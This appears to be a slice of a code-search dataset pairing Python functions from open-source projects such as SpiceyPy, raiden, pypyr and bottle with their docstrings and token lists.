repo
stringlengths
7
54
path
stringlengths
4
192
url
stringlengths
87
284
code
stringlengths
78
104k
code_tokens
sequence
docstring
stringlengths
1
46.9k
docstring_tokens
sequence
language
stringclasses
1 value
partition
stringclasses
3 values
cebel/pyuniprot
src/pyuniprot/manager/database.py
https://github.com/cebel/pyuniprot/blob/9462a6042c7c9295415a5eb589b77b27cb7c142b/src/pyuniprot/manager/database.py#L503-L514
def get_ec_numbers(cls, entry): """ get list of models.ECNumber objects from XML node entry :param entry: XML node entry :return: list of models.ECNumber objects """ ec_numbers = [] for ec in entry.iterfind("./protein/recommendedName/ecNumber"): ec_numbers.append(models.ECNumber(ec_number=ec.text)) return ec_numbers
[ "def", "get_ec_numbers", "(", "cls", ",", "entry", ")", ":", "ec_numbers", "=", "[", "]", "for", "ec", "in", "entry", ".", "iterfind", "(", "\"./protein/recommendedName/ecNumber\"", ")", ":", "ec_numbers", ".", "append", "(", "models", ".", "ECNumber", "(", "ec_number", "=", "ec", ".", "text", ")", ")", "return", "ec_numbers" ]
get list of models.ECNumber objects from XML node entry :param entry: XML node entry :return: list of models.ECNumber objects
[ "get", "list", "of", "models", ".", "ECNumber", "objects", "from", "XML", "node", "entry" ]
python
train
pypa/pipenv
pipenv/vendor/distlib/database.py
https://github.com/pypa/pipenv/blob/cae8d76c210b9777e90aab76e9c4b0e53bb19cde/pipenv/vendor/distlib/database.py#L580-L601
def _get_records(self): """ Get the list of installed files for the distribution :return: A list of tuples of path, hash and size. Note that hash and size might be ``None`` for some entries. The path is exactly as stored in the file (which is as in PEP 376). """ results = [] r = self.get_distinfo_resource('RECORD') with contextlib.closing(r.as_stream()) as stream: with CSVReader(stream=stream) as record_reader: # Base location is parent dir of .dist-info dir #base_location = os.path.dirname(self.path) #base_location = os.path.abspath(base_location) for row in record_reader: missing = [None for i in range(len(row), 3)] path, checksum, size = row + missing #if not os.path.isabs(path): # path = path.replace('/', os.sep) # path = os.path.join(base_location, path) results.append((path, checksum, size)) return results
[ "def", "_get_records", "(", "self", ")", ":", "results", "=", "[", "]", "r", "=", "self", ".", "get_distinfo_resource", "(", "'RECORD'", ")", "with", "contextlib", ".", "closing", "(", "r", ".", "as_stream", "(", ")", ")", "as", "stream", ":", "with", "CSVReader", "(", "stream", "=", "stream", ")", "as", "record_reader", ":", "# Base location is parent dir of .dist-info dir", "#base_location = os.path.dirname(self.path)", "#base_location = os.path.abspath(base_location)", "for", "row", "in", "record_reader", ":", "missing", "=", "[", "None", "for", "i", "in", "range", "(", "len", "(", "row", ")", ",", "3", ")", "]", "path", ",", "checksum", ",", "size", "=", "row", "+", "missing", "#if not os.path.isabs(path):", "# path = path.replace('/', os.sep)", "# path = os.path.join(base_location, path)", "results", ".", "append", "(", "(", "path", ",", "checksum", ",", "size", ")", ")", "return", "results" ]
Get the list of installed files for the distribution :return: A list of tuples of path, hash and size. Note that hash and size might be ``None`` for some entries. The path is exactly as stored in the file (which is as in PEP 376).
[ "Get", "the", "list", "of", "installed", "files", "for", "the", "distribution", ":", "return", ":", "A", "list", "of", "tuples", "of", "path", "hash", "and", "size", ".", "Note", "that", "hash", "and", "size", "might", "be", "None", "for", "some", "entries", ".", "The", "path", "is", "exactly", "as", "stored", "in", "the", "file", "(", "which", "is", "as", "in", "PEP", "376", ")", "." ]
python
train
raiden-network/raiden
raiden/transfer/mediated_transfer/mediator.py
https://github.com/raiden-network/raiden/blob/407ba15c72074e9de88771d6b9661ff4dc36bef5/raiden/transfer/mediated_transfer/mediator.py#L1056-L1107
def secret_learned( state: MediatorTransferState, channelidentifiers_to_channels: ChannelMap, pseudo_random_generator: random.Random, block_number: BlockNumber, block_hash: BlockHash, secret: Secret, secrethash: SecretHash, payee_address: Address, ) -> TransitionResult[MediatorTransferState]: """ Unlock the payee lock, reveal the lock to the payer, and if necessary register the secret on-chain. """ secret_reveal_events = set_offchain_secret( state, channelidentifiers_to_channels, secret, secrethash, ) set_offchain_reveal_state( state.transfers_pair, payee_address, ) onchain_secret_reveal = events_for_onchain_secretreveal_if_closed( channelmap=channelidentifiers_to_channels, transfers_pair=state.transfers_pair, secret=secret, secrethash=secrethash, block_hash=block_hash, ) offchain_secret_reveal = events_for_secretreveal( state.transfers_pair, secret, pseudo_random_generator, ) balance_proof = events_for_balanceproof( channelidentifiers_to_channels, state.transfers_pair, pseudo_random_generator, block_number, secret, secrethash, ) events = secret_reveal_events + offchain_secret_reveal + balance_proof + onchain_secret_reveal iteration = TransitionResult(state, events) return iteration
[ "def", "secret_learned", "(", "state", ":", "MediatorTransferState", ",", "channelidentifiers_to_channels", ":", "ChannelMap", ",", "pseudo_random_generator", ":", "random", ".", "Random", ",", "block_number", ":", "BlockNumber", ",", "block_hash", ":", "BlockHash", ",", "secret", ":", "Secret", ",", "secrethash", ":", "SecretHash", ",", "payee_address", ":", "Address", ",", ")", "->", "TransitionResult", "[", "MediatorTransferState", "]", ":", "secret_reveal_events", "=", "set_offchain_secret", "(", "state", ",", "channelidentifiers_to_channels", ",", "secret", ",", "secrethash", ",", ")", "set_offchain_reveal_state", "(", "state", ".", "transfers_pair", ",", "payee_address", ",", ")", "onchain_secret_reveal", "=", "events_for_onchain_secretreveal_if_closed", "(", "channelmap", "=", "channelidentifiers_to_channels", ",", "transfers_pair", "=", "state", ".", "transfers_pair", ",", "secret", "=", "secret", ",", "secrethash", "=", "secrethash", ",", "block_hash", "=", "block_hash", ",", ")", "offchain_secret_reveal", "=", "events_for_secretreveal", "(", "state", ".", "transfers_pair", ",", "secret", ",", "pseudo_random_generator", ",", ")", "balance_proof", "=", "events_for_balanceproof", "(", "channelidentifiers_to_channels", ",", "state", ".", "transfers_pair", ",", "pseudo_random_generator", ",", "block_number", ",", "secret", ",", "secrethash", ",", ")", "events", "=", "secret_reveal_events", "+", "offchain_secret_reveal", "+", "balance_proof", "+", "onchain_secret_reveal", "iteration", "=", "TransitionResult", "(", "state", ",", "events", ")", "return", "iteration" ]
Unlock the payee lock, reveal the lock to the payer, and if necessary register the secret on-chain.
[ "Unlock", "the", "payee", "lock", "reveal", "the", "lock", "to", "the", "payer", "and", "if", "necessary", "register", "the", "secret", "on", "-", "chain", "." ]
python
train
striglia/pyramid_swagger
pyramid_swagger/ingest.py
https://github.com/striglia/pyramid_swagger/blob/1dbc0b4f23e2e5f4ed575c116f3f7d0e83e30d45/pyramid_swagger/ingest.py#L247-L270
def ingest_resources(mapping, schema_dir): """Consume the Swagger schemas and produce a queryable datastructure. :param mapping: Map from resource name to filepath of its api declaration :type mapping: dict :param schema_dir: the directory schema files live inside :type schema_dir: string :returns: A list of mapping from :class:`RequestMatcher` to :class:`ValidatorMap` """ ingested_resources = [] for name, filepath in iteritems(mapping): try: ingested_resources.append(load_schema(filepath)) # If we have trouble reading any files, raise a more user-friendly # error. except IOError: raise ApiDeclarationNotFoundError( 'No api declaration found at {0}. Attempted to load the `{1}` ' 'resource relative to the schema_directory `{2}`. Perhaps ' 'your resource name and API declaration file do not ' 'match?'.format(filepath, name, schema_dir) ) return ingested_resources
[ "def", "ingest_resources", "(", "mapping", ",", "schema_dir", ")", ":", "ingested_resources", "=", "[", "]", "for", "name", ",", "filepath", "in", "iteritems", "(", "mapping", ")", ":", "try", ":", "ingested_resources", ".", "append", "(", "load_schema", "(", "filepath", ")", ")", "# If we have trouble reading any files, raise a more user-friendly", "# error.", "except", "IOError", ":", "raise", "ApiDeclarationNotFoundError", "(", "'No api declaration found at {0}. Attempted to load the `{1}` '", "'resource relative to the schema_directory `{2}`. Perhaps '", "'your resource name and API declaration file do not '", "'match?'", ".", "format", "(", "filepath", ",", "name", ",", "schema_dir", ")", ")", "return", "ingested_resources" ]
Consume the Swagger schemas and produce a queryable datastructure. :param mapping: Map from resource name to filepath of its api declaration :type mapping: dict :param schema_dir: the directory schema files live inside :type schema_dir: string :returns: A list of mapping from :class:`RequestMatcher` to :class:`ValidatorMap`
[ "Consume", "the", "Swagger", "schemas", "and", "produce", "a", "queryable", "datastructure", "." ]
python
train
ucsb-cs-education/hairball
hairball/__init__.py
https://github.com/ucsb-cs-education/hairball/blob/c6da8971f8a34e88ce401d36b51431715e1dff5b/hairball/__init__.py#L136-L158
def hairball_files(self, paths, extensions): """Yield filepath to files with the proper extension within paths.""" def add_file(filename): return os.path.splitext(filename)[1] in extensions while paths: arg_path = paths.pop(0) if os.path.isdir(arg_path): found = False for path, dirs, files in os.walk(arg_path): dirs.sort() # Traverse in sorted order for filename in sorted(files): if add_file(filename): yield os.path.join(path, filename) found = True if not found: if not self.options.quiet: print('No files found in {}'.format(arg_path)) elif add_file(arg_path): yield arg_path elif not self.options.quiet: print('Invalid file {}'.format(arg_path)) print('Did you forget to load a Kurt plugin (-k)?')
[ "def", "hairball_files", "(", "self", ",", "paths", ",", "extensions", ")", ":", "def", "add_file", "(", "filename", ")", ":", "return", "os", ".", "path", ".", "splitext", "(", "filename", ")", "[", "1", "]", "in", "extensions", "while", "paths", ":", "arg_path", "=", "paths", ".", "pop", "(", "0", ")", "if", "os", ".", "path", ".", "isdir", "(", "arg_path", ")", ":", "found", "=", "False", "for", "path", ",", "dirs", ",", "files", "in", "os", ".", "walk", "(", "arg_path", ")", ":", "dirs", ".", "sort", "(", ")", "# Traverse in sorted order", "for", "filename", "in", "sorted", "(", "files", ")", ":", "if", "add_file", "(", "filename", ")", ":", "yield", "os", ".", "path", ".", "join", "(", "path", ",", "filename", ")", "found", "=", "True", "if", "not", "found", ":", "if", "not", "self", ".", "options", ".", "quiet", ":", "print", "(", "'No files found in {}'", ".", "format", "(", "arg_path", ")", ")", "elif", "add_file", "(", "arg_path", ")", ":", "yield", "arg_path", "elif", "not", "self", ".", "options", ".", "quiet", ":", "print", "(", "'Invalid file {}'", ".", "format", "(", "arg_path", ")", ")", "print", "(", "'Did you forget to load a Kurt plugin (-k)?'", ")" ]
Yield filepath to files with the proper extension within paths.
[ "Yield", "filepath", "to", "files", "with", "the", "proper", "extension", "within", "paths", "." ]
python
train
siznax/frag2text
frag2text.py
https://github.com/siznax/frag2text/blob/ccb5cb9007931cce25e39d598bd2e790123c12e6/frag2text.py#L77-L95
def frag2text(endpoint, stype, selector, clean=False, raw=False, verbose=False): """returns Markdown text of selected fragment. Args: endpoint: URL, file, or HTML string stype: { 'css' | 'xpath' } selector: CSS selector or XPath expression Returns: Markdown text Options: clean: cleans fragment (lxml.html.clean defaults) raw: returns raw HTML fragment verbose: show http status, encoding, headers """ try: return main(endpoint, stype, selector, clean, raw, verbose) except StandardError as err: return err
[ "def", "frag2text", "(", "endpoint", ",", "stype", ",", "selector", ",", "clean", "=", "False", ",", "raw", "=", "False", ",", "verbose", "=", "False", ")", ":", "try", ":", "return", "main", "(", "endpoint", ",", "stype", ",", "selector", ",", "clean", ",", "raw", ",", "verbose", ")", "except", "StandardError", "as", "err", ":", "return", "err" ]
returns Markdown text of selected fragment. Args: endpoint: URL, file, or HTML string stype: { 'css' | 'xpath' } selector: CSS selector or XPath expression Returns: Markdown text Options: clean: cleans fragment (lxml.html.clean defaults) raw: returns raw HTML fragment verbose: show http status, encoding, headers
[ "returns", "Markdown", "text", "of", "selected", "fragment", "." ]
python
train
EliotBerriot/lifter
lifter/query.py
https://github.com/EliotBerriot/lifter/blob/9b4394b476cddd952b2af9540affc03f2977163d/lifter/query.py#L512-L522
def locally(self): """ Will execute the current queryset and pass it to the python backend so user can run query on the local dataset (instead of contacting the store) """ from .backends import python from . import models store = python.IterableStore(values=self) return store.query(self.manager.model).all()
[ "def", "locally", "(", "self", ")", ":", "from", ".", "backends", "import", "python", "from", ".", "import", "models", "store", "=", "python", ".", "IterableStore", "(", "values", "=", "self", ")", "return", "store", ".", "query", "(", "self", ".", "manager", ".", "model", ")", ".", "all", "(", ")" ]
Will execute the current queryset and pass it to the python backend so user can run query on the local dataset (instead of contacting the store)
[ "Will", "execute", "the", "current", "queryset", "and", "pass", "it", "to", "the", "python", "backend", "so", "user", "can", "run", "query", "on", "the", "local", "dataset", "(", "instead", "of", "contacting", "the", "store", ")" ]
python
train
AndrewAnnex/SpiceyPy
spiceypy/spiceypy.py
https://github.com/AndrewAnnex/SpiceyPy/blob/fc20a9b9de68b58eed5b332f0c051fb343a6e335/spiceypy/spiceypy.py#L7784-L7815
def latsrf(method, target, et, fixref, lonlat): """ Map array of planetocentric longitude/latitude coordinate pairs to surface points on a specified target body. The surface of the target body may be represented by a triaxial ellipsoid or by topographic data provided by DSK files. https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/latsrf_c.html :param method: Computation method. :type method: str :param target: Name of target body. :type target: str :param et: Epoch in TDB seconds past J2000 TDB. :type et: float :param fixref: Body-fixed, body-centered target body frame. :type fixref: str :param lonlat: Array of longitude/latitude coordinate pairs. :type lonlat: A 2xM-Element Array of floats :return: Array of surface points. :rtype: A 3xM-Element Array of floats """ method = stypes.stringToCharP(method) target = stypes.stringToCharP(target) et = ctypes.c_double(et) fixref = stypes.stringToCharP(fixref) npts = ctypes.c_int(len(lonlat)) lonlat = stypes.toDoubleMatrix(lonlat) srfpts = stypes.emptyDoubleMatrix(3, npts.value) libspice.latsrf_c(method, target, et, fixref, npts, lonlat, srfpts) return stypes.cMatrixToNumpy(srfpts)
[ "def", "latsrf", "(", "method", ",", "target", ",", "et", ",", "fixref", ",", "lonlat", ")", ":", "method", "=", "stypes", ".", "stringToCharP", "(", "method", ")", "target", "=", "stypes", ".", "stringToCharP", "(", "target", ")", "et", "=", "ctypes", ".", "c_double", "(", "et", ")", "fixref", "=", "stypes", ".", "stringToCharP", "(", "fixref", ")", "npts", "=", "ctypes", ".", "c_int", "(", "len", "(", "lonlat", ")", ")", "lonlat", "=", "stypes", ".", "toDoubleMatrix", "(", "lonlat", ")", "srfpts", "=", "stypes", ".", "emptyDoubleMatrix", "(", "3", ",", "npts", ".", "value", ")", "libspice", ".", "latsrf_c", "(", "method", ",", "target", ",", "et", ",", "fixref", ",", "npts", ",", "lonlat", ",", "srfpts", ")", "return", "stypes", ".", "cMatrixToNumpy", "(", "srfpts", ")" ]
Map array of planetocentric longitude/latitude coordinate pairs to surface points on a specified target body. The surface of the target body may be represented by a triaxial ellipsoid or by topographic data provided by DSK files. https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/latsrf_c.html :param method: Computation method. :type method: str :param target: Name of target body. :type target: str :param et: Epoch in TDB seconds past J2000 TDB. :type et: float :param fixref: Body-fixed, body-centered target body frame. :type fixref: str :param lonlat: Array of longitude/latitude coordinate pairs. :type lonlat: A 2xM-Element Array of floats :return: Array of surface points. :rtype: A 3xM-Element Array of floats
[ "Map", "array", "of", "planetocentric", "longitude", "/", "latitude", "coordinate", "pairs", "to", "surface", "points", "on", "a", "specified", "target", "body", ".", "The", "surface", "of", "the", "target", "body", "may", "be", "represented", "by", "a", "triaxial", "ellipsoid", "or", "by", "topographic", "data", "provided", "by", "DSK", "files", ".", "https", ":", "//", "naif", ".", "jpl", ".", "nasa", ".", "gov", "/", "pub", "/", "naif", "/", "toolkit_docs", "/", "C", "/", "cspice", "/", "latsrf_c", ".", "html", ":", "param", "method", ":", "Computation", "method", ".", ":", "type", "method", ":", "str", ":", "param", "target", ":", "Name", "of", "target", "body", ".", ":", "type", "target", ":", "str", ":", "param", "et", ":", "Epoch", "in", "TDB", "seconds", "past", "J2000", "TDB", ".", ":", "type", "et", ":", "float", ":", "param", "fixref", ":", "Body", "-", "fixed", "body", "-", "centered", "target", "body", "frame", ".", ":", "type", "fixref", ":", "str", ":", "param", "lonlat", ":", "Array", "of", "longitude", "/", "latitude", "coordinate", "pairs", ".", ":", "type", "lonlat", ":", "A", "2xM", "-", "Element", "Array", "of", "floats", ":", "return", ":", "Array", "of", "surface", "points", ".", ":", "rtype", ":", "A", "3xM", "-", "Element", "Array", "of", "floats" ]
python
train
townsenddw/jhubctl
jhubctl/hubs/hubs.py
https://github.com/townsenddw/jhubctl/blob/c8c20f86a16e9d01dd90e4607d81423417cc773b/jhubctl/hubs/hubs.py#L43-L57
def get(self, name=None): """Print a list of all jupyterHubs.""" # Print a list of hubs. if name is None: hubs = self.get_hubs() print("Running Jupyterhub Deployments (by name):") for hub_name in hubs: hub = Hub(namespace=hub_name) data = hub.get_description() url = data['LoadBalancer Ingress'] print(f' - Name: {hub_name}') print(f' Url: {url}') else: hub = Hub(namespace=name) hub.get()
[ "def", "get", "(", "self", ",", "name", "=", "None", ")", ":", "# Print a list of hubs.", "if", "name", "is", "None", ":", "hubs", "=", "self", ".", "get_hubs", "(", ")", "print", "(", "\"Running Jupyterhub Deployments (by name):\"", ")", "for", "hub_name", "in", "hubs", ":", "hub", "=", "Hub", "(", "namespace", "=", "hub_name", ")", "data", "=", "hub", ".", "get_description", "(", ")", "url", "=", "data", "[", "'LoadBalancer Ingress'", "]", "print", "(", "f' - Name: {hub_name}'", ")", "print", "(", "f' Url: {url}'", ")", "else", ":", "hub", "=", "Hub", "(", "namespace", "=", "name", ")", "hub", ".", "get", "(", ")" ]
Print a list of all jupyterHubs.
[ "Print", "a", "list", "of", "all", "jupyterHubs", "." ]
python
train
apache/incubator-heron
heron/tools/tracker/src/python/handlers/clustershandler.py
https://github.com/apache/incubator-heron/blob/ad10325a0febe89ad337e561ebcbe37ec5d9a5ac/heron/tools/tracker/src/python/handlers/clustershandler.py#L39-L43
def get(self): """ get method """ clusters = [statemgr.name for statemgr in self.tracker.state_managers] self.write_success_response(clusters)
[ "def", "get", "(", "self", ")", ":", "clusters", "=", "[", "statemgr", ".", "name", "for", "statemgr", "in", "self", ".", "tracker", ".", "state_managers", "]", "self", ".", "write_success_response", "(", "clusters", ")" ]
get method
[ "get", "method" ]
python
valid
bykof/billomapy
billomapy/billomapy.py
https://github.com/bykof/billomapy/blob/a28ba69fd37654fa145d0411d52c200e7f8984ab/billomapy/billomapy.py#L1755-L1768
def get_all_comments_of_incoming(self, incoming_id): """ Get all comments of incoming This will iterate over all pages until it gets all elements. So if the rate limit exceeded it will throw an Exception and you will get nothing :param incoming_id: the incoming id :return: list """ return self._iterate_through_pages( get_function=self.get_comments_of_incoming_per_page, resource=INCOMING_COMMENTS, **{'incoming_id': incoming_id} )
[ "def", "get_all_comments_of_incoming", "(", "self", ",", "incoming_id", ")", ":", "return", "self", ".", "_iterate_through_pages", "(", "get_function", "=", "self", ".", "get_comments_of_incoming_per_page", ",", "resource", "=", "INCOMING_COMMENTS", ",", "*", "*", "{", "'incoming_id'", ":", "incoming_id", "}", ")" ]
Get all comments of incoming This will iterate over all pages until it gets all elements. So if the rate limit exceeded it will throw an Exception and you will get nothing :param incoming_id: the incoming id :return: list
[ "Get", "all", "comments", "of", "incoming", "This", "will", "iterate", "over", "all", "pages", "until", "it", "gets", "all", "elements", ".", "So", "if", "the", "rate", "limit", "exceeded", "it", "will", "throw", "an", "Exception", "and", "you", "will", "get", "nothing" ]
python
train
thespacedoctor/fundamentals
fundamentals/tools.py
https://github.com/thespacedoctor/fundamentals/blob/1d2c007ac74442ec2eabde771cfcacdb9c1ab382/fundamentals/tools.py#L380-L387
def setup( self): """ **Summary:** *setup the attributes and return* """ return self.arguments, self.settings, self.log, self.dbConn
[ "def", "setup", "(", "self", ")", ":", "return", "self", ".", "arguments", ",", "self", ".", "settings", ",", "self", ".", "log", ",", "self", ".", "dbConn" ]
**Summary:** *setup the attributes and return*
[ "**", "Summary", ":", "**", "*", "setup", "the", "attributes", "and", "return", "*" ]
python
train
Enteee/pdml2flow
pdml2flow/conf.py
https://github.com/Enteee/pdml2flow/blob/bc9efe379b0b2406bfbbbd8e0f678b1f63805c66/pdml2flow/conf.py#L85-L180
def load(description, add_arguments_cb = lambda x: None, postprocess_conf_cb = lambda x: None): """Loads the global Conf object from command line arguments. Encode the next argument after +plugin to ensure that it does not start with a prefix_char """ argparser = ArgumentParser( description = description, prefix_chars = '-+' ) argparser.add_argument( '--version', dest = 'PRINT_VERSION', action = 'store_true', help = 'Print version and exit' ) add_arguments_cb(argparser) # set up plugin argument argparser plugin_argparser = argparser.add_argument_group('Plugins') plugins = {} def load_plugin_group(group): """Load all plugins from the given plugin_group.""" for entry_point in iter_entry_points(group = group): name = str(entry_point).split(' =',1)[0] plugin = entry_point.load() if isclass(plugin) \ and not plugin in Conf.SUPPORTED_PLUGIN_INTERFACES \ and any([ issubclass(plugin, supported_plugin_interface) for supported_plugin_interface in Conf.SUPPORTED_PLUGIN_INTERFACES ]): plugin_argparser.add_argument( '+{}'.format(name), dest = 'PLUGIN_{}'.format(name), type = str, nargs = '?', default = DEFAULT, metavar = 'args'.format(name), help = make_argparse_help_safe( call_plugin( plugin, 'help' ) ) ) # register plugin plugins[name] = plugin else: warning('Plugin not supported: {}'.format(name)) load_plugin_group(Conf.PLUGIN_GROUP_BASE) if Conf.LOAD_PLUGINS: load_plugin_group(Conf.PLUGIN_GROUP) conf = vars( argparser.parse_args([ v if i == 0 or v[0] == '+' or Conf.ARGS[i-1][0] != '+' else b32encode(v.encode()).decode() for i, v in enumerate(Conf.ARGS) ]) ) postprocess_conf_cb(conf) # apply configuration Conf.set(conf) if Conf.PRINT_VERSION: print( 'pdml2flow version {}'.format( Conf.VERSION ), file = Conf.OUT ) sys.exit(0) # initialize plugins Conf.PLUGINS = [] for conf_name, args in conf.items(): if conf_name.startswith('PLUGIN_') and args != DEFAULT: plugin_name = conf_name[7:] Conf.PLUGINS.append( # instantiate plugin plugins[plugin_name]( *split( b32decode(args.encode()).decode() if args is not None else '' ) ) )
[ "def", "load", "(", "description", ",", "add_arguments_cb", "=", "lambda", "x", ":", "None", ",", "postprocess_conf_cb", "=", "lambda", "x", ":", "None", ")", ":", "argparser", "=", "ArgumentParser", "(", "description", "=", "description", ",", "prefix_chars", "=", "'-+'", ")", "argparser", ".", "add_argument", "(", "'--version'", ",", "dest", "=", "'PRINT_VERSION'", ",", "action", "=", "'store_true'", ",", "help", "=", "'Print version and exit'", ")", "add_arguments_cb", "(", "argparser", ")", "# set up plugin argument argparser", "plugin_argparser", "=", "argparser", ".", "add_argument_group", "(", "'Plugins'", ")", "plugins", "=", "{", "}", "def", "load_plugin_group", "(", "group", ")", ":", "\"\"\"Load all plugins from the given plugin_group.\"\"\"", "for", "entry_point", "in", "iter_entry_points", "(", "group", "=", "group", ")", ":", "name", "=", "str", "(", "entry_point", ")", ".", "split", "(", "' ='", ",", "1", ")", "[", "0", "]", "plugin", "=", "entry_point", ".", "load", "(", ")", "if", "isclass", "(", "plugin", ")", "and", "not", "plugin", "in", "Conf", ".", "SUPPORTED_PLUGIN_INTERFACES", "and", "any", "(", "[", "issubclass", "(", "plugin", ",", "supported_plugin_interface", ")", "for", "supported_plugin_interface", "in", "Conf", ".", "SUPPORTED_PLUGIN_INTERFACES", "]", ")", ":", "plugin_argparser", ".", "add_argument", "(", "'+{}'", ".", "format", "(", "name", ")", ",", "dest", "=", "'PLUGIN_{}'", ".", "format", "(", "name", ")", ",", "type", "=", "str", ",", "nargs", "=", "'?'", ",", "default", "=", "DEFAULT", ",", "metavar", "=", "'args'", ".", "format", "(", "name", ")", ",", "help", "=", "make_argparse_help_safe", "(", "call_plugin", "(", "plugin", ",", "'help'", ")", ")", ")", "# register plugin", "plugins", "[", "name", "]", "=", "plugin", "else", ":", "warning", "(", "'Plugin not supported: {}'", ".", "format", "(", "name", ")", ")", "load_plugin_group", "(", "Conf", ".", "PLUGIN_GROUP_BASE", ")", "if", "Conf", ".", "LOAD_PLUGINS", ":", "load_plugin_group", "(", "Conf", ".", "PLUGIN_GROUP", ")", "conf", "=", "vars", "(", "argparser", ".", "parse_args", "(", "[", "v", "if", "i", "==", "0", "or", "v", "[", "0", "]", "==", "'+'", "or", "Conf", ".", "ARGS", "[", "i", "-", "1", "]", "[", "0", "]", "!=", "'+'", "else", "b32encode", "(", "v", ".", "encode", "(", ")", ")", ".", "decode", "(", ")", "for", "i", ",", "v", "in", "enumerate", "(", "Conf", ".", "ARGS", ")", "]", ")", ")", "postprocess_conf_cb", "(", "conf", ")", "# apply configuration", "Conf", ".", "set", "(", "conf", ")", "if", "Conf", ".", "PRINT_VERSION", ":", "print", "(", "'pdml2flow version {}'", ".", "format", "(", "Conf", ".", "VERSION", ")", ",", "file", "=", "Conf", ".", "OUT", ")", "sys", ".", "exit", "(", "0", ")", "# initialize plugins", "Conf", ".", "PLUGINS", "=", "[", "]", "for", "conf_name", ",", "args", "in", "conf", ".", "items", "(", ")", ":", "if", "conf_name", ".", "startswith", "(", "'PLUGIN_'", ")", "and", "args", "!=", "DEFAULT", ":", "plugin_name", "=", "conf_name", "[", "7", ":", "]", "Conf", ".", "PLUGINS", ".", "append", "(", "# instantiate plugin", "plugins", "[", "plugin_name", "]", "(", "*", "split", "(", "b32decode", "(", "args", ".", "encode", "(", ")", ")", ".", "decode", "(", ")", "if", "args", "is", "not", "None", "else", "''", ")", ")", ")" ]
Loads the global Conf object from command line arguments. Encode the next argument after +plugin to ensure that it does not start with a prefix_char
[ "Loads", "the", "global", "Conf", "object", "from", "command", "line", "arguments", "." ]
python
train
23andMe/Yamale
yamale/validators/base.py
https://github.com/23andMe/Yamale/blob/0a75b4205624d9bccc52bda03efaf0d58c143c76/yamale/validators/base.py#L47-L67
def validate(self, value): """ Check if ``value`` is valid. :returns: [errors] If ``value`` is invalid, otherwise []. """ errors = [] # Make sure the type validates first. valid = self._is_valid(value) if not valid: errors.append(self.fail(value)) return errors # Then validate all the constraints second. for constraint in self._constraints_inst: error = constraint.is_valid(value) if error: errors.append(error) return errors
[ "def", "validate", "(", "self", ",", "value", ")", ":", "errors", "=", "[", "]", "# Make sure the type validates first.", "valid", "=", "self", ".", "_is_valid", "(", "value", ")", "if", "not", "valid", ":", "errors", ".", "append", "(", "self", ".", "fail", "(", "value", ")", ")", "return", "errors", "# Then validate all the constraints second.", "for", "constraint", "in", "self", ".", "_constraints_inst", ":", "error", "=", "constraint", ".", "is_valid", "(", "value", ")", "if", "error", ":", "errors", ".", "append", "(", "error", ")", "return", "errors" ]
Check if ``value`` is valid. :returns: [errors] If ``value`` is invalid, otherwise [].
[ "Check", "if", "value", "is", "valid", "." ]
python
train
thomasdelaet/python-velbus
velbus/message.py
https://github.com/thomasdelaet/python-velbus/blob/af2f8af43f1a24bf854eff9f3126fd7b5c41b3dd/velbus/message.py#L62-L68
def to_binary(self): """ :return: bytes """ pre_checksum_data = self.__checksum_data() checksum = velbus.checksum(pre_checksum_data) return pre_checksum_data + checksum + bytes([velbus.END_BYTE])
[ "def", "to_binary", "(", "self", ")", ":", "pre_checksum_data", "=", "self", ".", "__checksum_data", "(", ")", "checksum", "=", "velbus", ".", "checksum", "(", "pre_checksum_data", ")", "return", "pre_checksum_data", "+", "checksum", "+", "bytes", "(", "[", "velbus", ".", "END_BYTE", "]", ")" ]
:return: bytes
[ ":", "return", ":", "bytes" ]
python
train
hannorein/rebound
rebound/simulation.py
https://github.com/hannorein/rebound/blob/bb0f814c98e629401acaab657cae2304b0e003f7/rebound/simulation.py#L1494-L1498
def save(self, filename): """ Save the entire REBOUND simulation to a binary file. """ clibrebound.reb_output_binary(byref(self), c_char_p(filename.encode("ascii")))
[ "def", "save", "(", "self", ",", "filename", ")", ":", "clibrebound", ".", "reb_output_binary", "(", "byref", "(", "self", ")", ",", "c_char_p", "(", "filename", ".", "encode", "(", "\"ascii\"", ")", ")", ")" ]
Save the entire REBOUND simulation to a binary file.
[ "Save", "the", "entire", "REBOUND", "simulation", "to", "a", "binary", "file", "." ]
python
train
pypyr/pypyr-cli
pypyr/steps/contextclear.py
https://github.com/pypyr/pypyr-cli/blob/4003f999cd5eb030b4c7407317de728f5115a80f/pypyr/steps/contextclear.py#L13-L46
def run_step(context): """Remove specified keys from context. Args: Context is a dictionary or dictionary-like. context['contextClear'] must exist. It's a dictionary. Will iterate context['contextClear'] and remove those keys from context. For example, say input context is: key1: value1 key2: value2 key3: value3 key4: value4 contextClear: - key2 - key4 - contextClear This will result in return context: key1: value1 key3: value3 """ logger.debug("started") context.assert_key_has_value(key='contextClear', caller=__name__) for k in context['contextClear']: logger.debug(f"removing {k} from context") # slightly unorthodox pop returning None means you don't get a KeyError # if key doesn't exist context.pop(k, None) logger.info(f"removed {k} from context") logger.debug("done")
[ "def", "run_step", "(", "context", ")", ":", "logger", ".", "debug", "(", "\"started\"", ")", "context", ".", "assert_key_has_value", "(", "key", "=", "'contextClear'", ",", "caller", "=", "__name__", ")", "for", "k", "in", "context", "[", "'contextClear'", "]", ":", "logger", ".", "debug", "(", "f\"removing {k} from context\"", ")", "# slightly unorthodox pop returning None means you don't get a KeyError", "# if key doesn't exist", "context", ".", "pop", "(", "k", ",", "None", ")", "logger", ".", "info", "(", "f\"removed {k} from context\"", ")", "logger", ".", "debug", "(", "\"done\"", ")" ]
Remove specified keys from context. Args: Context is a dictionary or dictionary-like. context['contextClear'] must exist. It's a dictionary. Will iterate context['contextClear'] and remove those keys from context. For example, say input context is: key1: value1 key2: value2 key3: value3 key4: value4 contextClear: - key2 - key4 - contextClear This will result in return context: key1: value1 key3: value3
[ "Remove", "specified", "keys", "from", "context", "." ]
python
train
samghelms/mathviz
mathviz_hopper/src/bottle.py
https://github.com/samghelms/mathviz/blob/30fe89537379faea4de8c8b568ac6e52e4d15353/mathviz_hopper/src/bottle.py#L3602-L3614
def load_app(target): """ Load a bottle application from a module and make sure that the import does not affect the current default application, but returns a separate application object. See :func:`load` for the target parameter. """ global NORUN NORUN, nr_old = True, NORUN tmp = default_app.push() # Create a new "default application" try: rv = load(target) # Import the target module return rv if callable(rv) else tmp finally: default_app.remove(tmp) # Remove the temporary added default application NORUN = nr_old
